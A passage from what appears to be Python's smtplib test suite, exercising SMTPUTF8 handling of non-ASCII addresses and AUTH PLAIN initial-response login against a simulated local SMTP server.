self.assertRaises(UnicodeEncodeError, smtp.mail, 'Älice')
def test_send_message_error_on_non_ascii_addrs_if_no_smtputf8(self):
# This test is located here and not in the SMTPUTF8SimTests
# class because it needs a "regular" SMTP server to work
msg = EmailMessage()
msg['From'] = "Páolo <fő[email protected]>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(smtplib.SMTPNotSupportedError):
smtp.send_message(msg)
def test_name_field_not_included_in_envelop_addresses(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
message = EmailMessage()
message['From'] = email.utils.formataddr(('Michaël', '[email protected]'))
message['To'] = email.utils.formataddr(('René', '[email protected]'))
self.assertDictEqual(smtp.send_message(message), {})
self.assertEqual(self.serv._addresses['from'], '[email protected]')
self.assertEqual(self.serv._addresses['tos'], ['[email protected]'])
class SimSMTPUTF8Server(SimSMTPServer):
def __init__(self, *args, **kw):
# The base SMTP server turns these on automatically, but our test
# server is set up to munge the EHLO response, so we need to provide
# them as well. And yes, the call is to SMTPServer not SimSMTPServer.
self._extra_features = ['SMTPUTF8', '8BITMIME']
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data,
enable_SMTPUTF8=self.enable_SMTPUTF8,
)
def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,
rcpt_options=None):
self.last_peer = peer
self.last_mailfrom = mailfrom
self.last_rcpttos = rcpttos
self.last_message = data
self.last_mail_options = mail_options
self.last_rcpt_options = rcpt_options
class SMTPUTF8SimTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPUTF8Server((HOST, 0), ('nowhere', -1),
decode_data=False,
enable_SMTPUTF8=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def test_test_server_supports_extensions(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertTrue(smtp.has_extn('smtputf8'))
def test_send_unicode_with_SMTPUTF8_via_sendmail(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('Jőhn', 'Sálly', m,
mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertEqual(self.serv.last_mailfrom, 'Jőhn')
self.assertEqual(self.serv.last_rcpttos, ['Sálly'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_unicode_with_SMTPUTF8_via_low_level_API(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertEqual(
smtp.mail('Jő', options=['BODY=8BITMIME', 'SMTPUTF8']),
(250, b'OK'))
self.assertEqual(smtp.rcpt('János'), (250, b'OK'))
self.assertEqual(smtp.data(m), (250, b'OK'))
self.assertEqual(self.serv.last_mailfrom, 'Jő')
self.assertEqual(self.serv.last_rcpttos, ['János'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_message_uses_smtputf8_if_addrs_non_ascii(self):
msg = EmailMessage()
msg['From'] = "Páolo <fő[email protected]>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
# XXX I don't know why I need two \n's here, but this is an existing
# bug (if it is one) and not a problem with the new functionality.
msg.set_content("oh là là, know what I mean, know what I mean?\n\n")
# XXX smtpd converts received /r/n to /n, so we can't easily test that
# we are successfully sending /r/n :(.
expected = textwrap.dedent("""\
From: Páolo <fő[email protected]>
To: Dinsdale
Subject: Nudge nudge, wink, wink \u1F609
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
oh là là, know what I mean, know what I mean?
""")
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertEqual(smtp.send_message(msg), {})
self.assertEqual(self.serv.last_mailfrom, 'fő[email protected]')
self.assertEqual(self.serv.last_rcpttos, ['Dinsdale'])
self.assertEqual(self.serv.last_message.decode(), expected)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
EXPECTED_RESPONSE = encode_base64(b'\0psu\0doesnotexist', eol='')
class SimSMTPAUTHInitialResponseChannel(SimSMTPChannel):
def smtp_AUTH(self, arg):
# RFC 4954's AUTH command allows for an optional initial-response.
# Not all AUTH methods support this; some require a challenge. AUTH
# PLAIN does those, so test that here. See issue #15014.
args = arg.split()
if args[0].lower() == 'plain':
if len(args) == 2:
# AUTH PLAIN <initial-response> with the response base 64
# encoded. Hard code the expected response for the test.
if args[1] == EXPECTED_RESPONSE:
self.push('235 Ok')
return
self.push('571 Bad authentication')
class SimSMTPAUTHInitialResponseServer(SimSMTPServer):
channel_class = SimSMTPAUTHInitialResponseChannel
class SMTPAUTHInitialResponseSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPAUTHInitialResponseServer(
(HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testAUTH_PLAIN_initial_response_login(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.login('psu', 'doesnotexist')
smtp.close()
def testAUTH_PLAIN_initial_response_auth(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.user = 'psu'
smtp.password = 'doesnotexist'
code, response = smtp.auth('plain', smtp.auth_plain)
smtp.close()
self.assertEqual(code, 235)
if __name__ == '__main__':
unittest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.